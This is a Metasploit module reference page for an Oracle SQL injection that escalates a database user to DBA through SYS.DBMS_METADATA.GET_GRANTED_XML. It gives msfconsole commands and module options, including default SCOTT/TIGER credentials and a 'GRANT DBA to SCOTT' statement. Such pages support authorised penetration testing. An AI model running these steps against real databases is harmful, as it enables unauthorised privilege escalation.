Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML | Metasploit Exploit Database (DB)

Home > Exploit DB

Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML

This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.

Search Other Modules

Rank

Normal

Authors

MC < mc [at] metasploit.com >

Vulnerability References

http://www.metasploit.com

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml
msf auxiliary(dbms_metadata_get_granted_xml) > set RHOST [TARGET IP]
msf auxiliary(dbms_metadata_get_granted_xml) > run

Module Options

DBPASS	The password to authenticate with. (default: TIGER)
DBUSER	The username to authenticate with. (default: SCOTT)
RHOST	The Oracle host. (default: )
RPORT	The TNS port. (default: 1521)
SID	The sid to authenticate with. (default: ORCL)
SQL	SQL to execute. (default: GRANT DBA to SCOTT)
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module